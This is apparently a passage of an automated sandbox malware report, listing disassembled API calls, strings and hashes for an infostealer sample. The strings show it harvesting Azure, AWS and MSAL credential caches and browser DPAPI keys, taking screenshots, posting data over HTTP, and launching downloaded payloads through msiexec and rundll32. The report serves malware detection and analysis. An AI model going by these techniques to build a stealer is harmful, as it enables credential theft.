                                            • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                            • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00793010,?,000003E8), ref: 00414A4A
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                            • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                            • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                            • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                          • memset.MSVCRT ref: 00414F2B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                          • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                          • API String ID: 4017274736-156832076
                                          • Opcode ID: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                          • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                          • Opcode Fuzzy Hash: c1a912e1918b28a31d7af5b1191f4ab077717743ad3d56635481e1ea4761ad81
                                          • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                          APIs
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0064A63C,00000000,?,0042144C,00000000,?,?), ref: 022CCCD3
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 022CCCF0
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 022CCCFC
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 022CCD0F
                                          • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 022CCD1C
                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 022CCD40
                                          • StrStrA.SHLWAPI(?,0064A1B0,00420B52), ref: 022CCD5E
                                          • StrStrA.SHLWAPI(00000000,0064A364), ref: 022CCD85
                                          • StrStrA.SHLWAPI(?,0064A4D0,00000000,?,00421458,00000000,?,00000000,00000000,?,0064A15C,00000000,?,00421454,00000000,?), ref: 022CCF09
                                          • StrStrA.SHLWAPI(00000000,0064A4CC), ref: 022CCF20
                                            • Part of subcall function 022CCA87: memset.MSVCRT ref: 022CCABA
                                            • Part of subcall function 022CCA87: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 022CCAD8
                                            • Part of subcall function 022CCA87: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 022CCAE3
                                            • Part of subcall function 022CCA87: memcpy.MSVCRT(?,?,?), ref: 022CCB79
                                          • StrStrA.SHLWAPI(?,0064A4CC,00000000,?,0042145C,00000000,?,00000000,0064A0DC), ref: 022CCFC1
                                          • StrStrA.SHLWAPI(00000000,0064A5A8), ref: 022CCFD8
                                            • Part of subcall function 022CCA87: lstrcat.KERNEL32(?,00420B46), ref: 022CCBAA
                                            • Part of subcall function 022CCA87: lstrcat.KERNEL32(?,00420B47), ref: 022CCBBE
                                            • Part of subcall function 022CCA87: lstrcat.KERNEL32(?,00420B4E), ref: 022CCBDF
                                          • lstrlen.KERNEL32(00000000), ref: 022CD0AB
                                          • CloseHandle.KERNEL32(00000000), ref: 022CD103
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                          • String ID:
                                          • API String ID: 3555725114-3916222277
                                          • Opcode ID: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                          • Instruction ID: 0a7b4450b9d65634a85e0f2fefb9568e94289d68a23b06e8371795a75dc8f135
                                          • Opcode Fuzzy Hash: 9842806969cad6799f0f7568e9bc81044bc23dbf52ae901b6399e5f6c005bae5
                                          • Instruction Fuzzy Hash: 50E1FA76920248ABCB14EFE4DD95EEEB77ABF24300F144159F106A7194EF346A89CF60
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,007994D8,00000000,?,0042144C,00000000,?,?), ref: 0040CA6C
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040CA89
                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040CA95
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0040CAA8
                                          • ??2@YAPAXI@Z.MSVCRT(-00000001), ref: 0040CAB5
                                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040CAD9
                                          • StrStrA.SHLWAPI(?,00799568,00420B52), ref: 0040CAF7
                                          • StrStrA.SHLWAPI(00000000,00799580), ref: 0040CB1E
                                          • StrStrA.SHLWAPI(?,00799C60,00000000,?,00421458,00000000,?,00000000,00000000,?,00792EA0,00000000,?,00421454,00000000,?), ref: 0040CCA2
                                          • StrStrA.SHLWAPI(00000000,00799D00), ref: 0040CCB9
                                            • Part of subcall function 0040C820: memset.MSVCRT ref: 0040C853
                                            • Part of subcall function 0040C820: lstrlenA.KERNEL32(?,00000001,?,00000000,00000000,00000000,00000000,?,00792FC0), ref: 0040C871
                                            • Part of subcall function 0040C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0040C87C
                                            • Part of subcall function 0040C820: memcpy.MSVCRT(?,?,?), ref: 0040C912
                                          • StrStrA.SHLWAPI(?,00799D00,00000000,?,0042145C,00000000,?,00000000,00792FC0), ref: 0040CD5A
                                          • StrStrA.SHLWAPI(00000000,00793100), ref: 0040CD71
                                            • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B46), ref: 0040C943
                                            • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B47), ref: 0040C957
                                            • Part of subcall function 0040C820: lstrcatA.KERNEL32(?,00420B4E), ref: 0040C978
                                          • lstrlenA.KERNEL32(00000000), ref: 0040CE44
                                          • CloseHandle.KERNEL32(00000000), ref: 0040CE9C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$??2@BinaryCloseCreateCryptHandleReadSizeStringmemcpymemset
                                          • String ID:
                                          • API String ID: 3555725114-3916222277
                                          • Opcode ID: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                          • Instruction ID: fb2464dfdb87d028b9341c66972094ccea7bc9213c5b9a6eafc00a4a54def107
                                          • Opcode Fuzzy Hash: ab42b5dea98dda6d1ec903180b661801f10a54a23581749008f7fe7b71c2160c
                                          • Instruction Fuzzy Hash: 2FE13E71911108ABCB14FBA1DC91FEEB779AF14314F40416EF10673191EF386A9ACB6A
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 004131C5
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 0041335D
                                          • ShellExecuteEx.SHELL32(0000003C), ref: 004134EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell$lstrcpy
                                          • String ID: /i "$ /passive$"" $.dll$.msi$<$@Ly$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe$/y$0y
                                          • API String ID: 2507796910-2339340332
                                          • Opcode ID: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                          • Instruction ID: 17233f41fb1950bff335544576ea1941aa871c2d7c6c7a5a475621d351ca9112
                                          • Opcode Fuzzy Hash: 154c5dc731ad3e96d902aef29615356604d56b336ceddfc02004fe10789c21fa
                                          • Instruction Fuzzy Hash: 96125F718111089ADB09FBA1DD92FEEB778AF14314F50415EF10666091EF382BDACF6A
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • RegOpenKeyExA.ADVAPI32(00000000,00796980,00000000,00020019,00000000,004205B6), ref: 004183A4
                                          • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00418426
                                          • wsprintfA.USER32 ref: 00418459
                                          • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0041847B
                                          • RegCloseKey.ADVAPI32(00000000), ref: 0041848C
                                          • RegCloseKey.ADVAPI32(00000000), ref: 00418499
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseOpenlstrcpy$Enumwsprintf
                                          • String ID: - $%s\%s$?
                                          • API String ID: 3246050789-3278919252
                                          • Opcode ID: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                          • Instruction ID: f03ee3f6de4a678c4a24becac03c3675d5d4362b87af83515ad79f9b006405b7
                                          • Opcode Fuzzy Hash: be8ddf1fe9dc456048681201925a0f877c5bcd284375678f65f072a6cae44d7f
                                          • Instruction Fuzzy Hash: B4813E75911118ABEB24DF50CD81FEAB7B9FF08714F008299E109A6180DF756BC6CFA5
                                          APIs
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                          • memset.MSVCRT ref: 00410C1C
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00410C35
                                          • lstrcatA.KERNEL32(?,00420D7C), ref: 00410C47
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00410C5D
                                          • lstrcatA.KERNEL32(?,00420D80), ref: 00410C6F
                                          • lstrcatA.KERNEL32(?,00000000), ref: 00410C88
                                          • lstrcatA.KERNEL32(?,00420D84), ref: 00410C9A
                                          • lstrlenA.KERNEL32(?), ref: 00410CA7
                                          • memset.MSVCRT ref: 00410CCD
                                          • memset.MSVCRT ref: 00410CE1
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00792F70,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                            • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00794A78,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                            • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                            • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                            • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                            • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                            • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                            • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                            • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                            • Part of subcall function 004196C0: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,00410B85,?,00000000,?,00000000,004205C6,004205C5), ref: 004196E1
                                          • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00420D88,?,00000000), ref: 00410D5A
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00410D66
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$lstrcpy$lstrlenmemset$Create$FileObjectProcessSingleSystemTimeWait
                                          • String ID: .exe
                                          • API String ID: 1395395982-4119554291
                                          • Opcode ID: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                          • Instruction ID: 8c4414bd7b792449c86a3c64e171a12ac7102eaeec46e1acf96b3d3d4dd6cf75
                                          • Opcode Fuzzy Hash: 77704baf693414c0c6232ee0e38bb13a65318062e1f1704c2aae0d7082b93def
                                          • Instruction Fuzzy Hash: A78194B55111186BCB14FBA1CD52FEE7338AF44308F40419EB30A66082DE786AD9CF6E
                                          APIs
                                            • Part of subcall function 022DAA07: lstrcpy.KERNEL32(?,00000000), ref: 022DAA4D
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A51
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A68
                                            • Part of subcall function 022C4A17: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 022C4A7F
                                            • Part of subcall function 022C4A17: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 022C4AA0
                                            • Part of subcall function 022C4A17: InternetCrackUrlA.WININET(00000000,00000000), ref: 022C4AB0
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 022C4B7C
                                          • StrCmpCA.SHLWAPI(?,0064A480), ref: 022C4BA1
                                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 022C4D21
                                          • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00420DDB,00000000,?,?,00000000,?,00421988,00000000,?,0064A514), ref: 022C504F
                                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 022C506B
                                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 022C507F
                                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 022C50B0
                                          • InternetCloseHandle.WININET(00000000), ref: 022C5114
                                          • InternetCloseHandle.WININET(00000000), ref: 022C512C
                                          • HttpOpenRequestA.WININET(00000000,0064A49C,?,0064A2B4,00000000,00000000,00400100,00000000), ref: 022C4D7C
                                            • Part of subcall function 022DAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022DAC2C
                                            • Part of subcall function 022DAC17: lstrcpy.KERNEL32(00000000), ref: 022DAC6B
                                            • Part of subcall function 022DAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022DAC79
                                            • Part of subcall function 022DAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022DAB6C
                                            • Part of subcall function 022DAB87: lstrcpy.KERNEL32(00000000,?), ref: 022DABD9
                                            • Part of subcall function 022DAB87: lstrcat.KERNEL32(00000000), ref: 022DABE9
                                          • InternetCloseHandle.WININET(00000000), ref: 022C5136
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Internet$lstrcpy$lstrlen$??2@CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                          • String ID: HJy
                                          • API String ID: 2402878923-2726783869
                                          • Opcode ID: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                          • Instruction ID: c04cbfa863c877678abb076aa626a8679c7455da1ae4142f444f4038f47feaaf
                                          • Opcode Fuzzy Hash: e9436af98fd97f90fb33399614dfc20492c57c9e4b406ec8cb954eac7af19915
                                          • Instruction Fuzzy Hash: 80122E72A20718AACB14EBE4DD91FEEB37ABF25300F504199A10672194EF742F89CF51
                                          APIs
                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0041906C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateGlobalStream
                                          • String ID: image/jpeg
                                          • API String ID: 2244384528-3785015651
                                          • Opcode ID: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                          • Instruction ID: d6dc09ab2bfedf2d54b470b914d8c7211c5e4dd185e8bb692af35d1d417654b8
                                          • Opcode Fuzzy Hash: c966b1d2bff0186d16334794f0ecdb2948fd0a8507f778a3f9c1e08f5450a090
                                          • Instruction Fuzzy Hash: 7D711B75A40208BBDB04EFE4DC99FEEB7B9FB48300F108509F515A7290DB38A945CB65
                                          APIs
                                          • strtok_s.MSVCRT ref: 00411307
                                          • strtok_s.MSVCRT ref: 00411750
                                            • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,00792F70,?,0042110C,?,00000000), ref: 0041A82B
                                            • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2337926836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.2337926836.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2337926836.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: strtok_s$lstrcpylstrlen
                                          • String ID:
                                          • API String ID: 348468850-0
                                          • Opcode ID: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                          • Instruction ID: 4a233ae47f87f64f9a2ed81d2cca976e3c75948f423937a2df4e62cfbc7c3e06
                                          • Opcode Fuzzy Hash: c36c6220a1731f690f2bad5fcd02e57531a13a3029cc92974acfb62a5780bfb7
                                          • Instruction Fuzzy Hash: C7C1D6B5941218ABCB14EF60DC89FEA7379BF54304F00449EF50AA7241DB78AAC5CF95
                                          APIs
                                          • memset.MSVCRT ref: 022D4505
                                          • memset.MSVCRT ref: 022D451C
                                            • Part of subcall function 022D9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022D9072
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D4553
                                          • lstrcat.KERNEL32(?,0064A30C), ref: 022D4572
                                          • lstrcat.KERNEL32(?,?), ref: 022D4586
                                          • lstrcat.KERNEL32(?,0064A5D8), ref: 022D459A
                                            • Part of subcall function 022DA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022DA9EF
                                            • Part of subcall function 022D8FF7: GetFileAttributesA.KERNEL32(00000000,?,022C1DBB,?,?,0042565C,?,?,00420E1F), ref: 022D9006
                                            • Part of subcall function 022C9F47: StrStrA.SHLWAPI(00000000,004212AC), ref: 022C9FA0
                                            • Part of subcall function 022C9F47: memcmp.MSVCRT(?,0042125C,00000005), ref: 022C9FF9
                                            • Part of subcall function 022C9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022C9C53
                                            • Part of subcall function 022C9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022C9C78
                                            • Part of subcall function 022C9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022C9C98
                                            • Part of subcall function 022C9C27: ReadFile.KERNEL32(000000FF,?,00000000,022C16F6,00000000), ref: 022C9CC1
                                            • Part of subcall function 022C9C27: LocalFree.KERNEL32(022C16F6), ref: 022C9CF7
                                            • Part of subcall function 022C9C27: CloseHandle.KERNEL32(000000FF), ref: 022C9D01
                                            • Part of subcall function 022D9627: GlobalAlloc.KERNEL32(00000000,022D4644,022D4644), ref: 022D963A
                                          • StrStrA.SHLWAPI(?,0064A0D8), ref: 022D465A
                                          • GlobalFree.KERNEL32(?), ref: 022D4779
                                            • Part of subcall function 022C9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022C5155,00000000,00000000), ref: 022C9D56
                                            • Part of subcall function 022C9D27: LocalAlloc.KERNEL32(00000040,?,?,?,022C5155,00000000,?), ref: 022C9D68
                                            • Part of subcall function 022C9D27: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,022C5155,00000000,00000000), ref: 022C9D91
                                            • Part of subcall function 022C9D27: LocalFree.KERNEL32(?,?,?,?,022C5155,00000000,?), ref: 022C9DA6
                                            • Part of subcall function 022CA077: memcmp.MSVCRT(?,00421264,00000003), ref: 022CA094
                                          • lstrcat.KERNEL32(?,00000000), ref: 022D470A
                                          • StrCmpCA.SHLWAPI(?,004208D1), ref: 022D4727
                                          • lstrcat.KERNEL32(00000000,00000000), ref: 022D4739
                                          • lstrcat.KERNEL32(00000000,?), ref: 022D474C
                                          • lstrcat.KERNEL32(00000000,00420FB8), ref: 022D475B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2338947321.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_22c0000_mJXdkcP4Wx.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalStringmemcmpmemset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                          • String ID:
                                          • API String ID: 1191620704-0
                                          • Opcode ID: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                          • Instruction ID: 61eb6af298cb72095e52a379da0bdfdf943360b8c9da32a0bc21a365c6326266
                                          • Opcode Fuzzy Hash: e8d6e6767f46891ec996ef8822d66cebf734f8a34e2b49da607d012598c1f812
                                          • Instruction Fuzzy Hash: 587142B6910218BBDB14FBE0DC85FEE737AAF49300F008598E60596184DB75DB59CF91
                                          APIs
                                          • memset.MSVCRT ref: 0041429E
                                          • memset.MSVCRT ref: 004142B5
                                            • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                          • lstrcatA.KERNEL32(?,00000000), ref: 004142EC
                                          • lstrcatA.KERNEL32(?,00799988), ref: 0041430B
                                          • lstrcatA.KERNEL32(?,?), ref: 0041431F
                                          • lstrcatA.KERNEL32(?,007995C8), ref: 00414333
                                            • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                            • Part of subcall function 00418D90: GetFileAttributesA.KERNEL32(00000000,?,00410117,?,00000000,?,00000000,00420DAB,00420DAA), ref: 00418D9F
                                            • Part of subcall function 00409CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00409D39
                                            • Part of subcall function 00409CE0: memcmp.MSVCRT(?,DPAPI,00000005), ref: 00409D92
                                            • Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
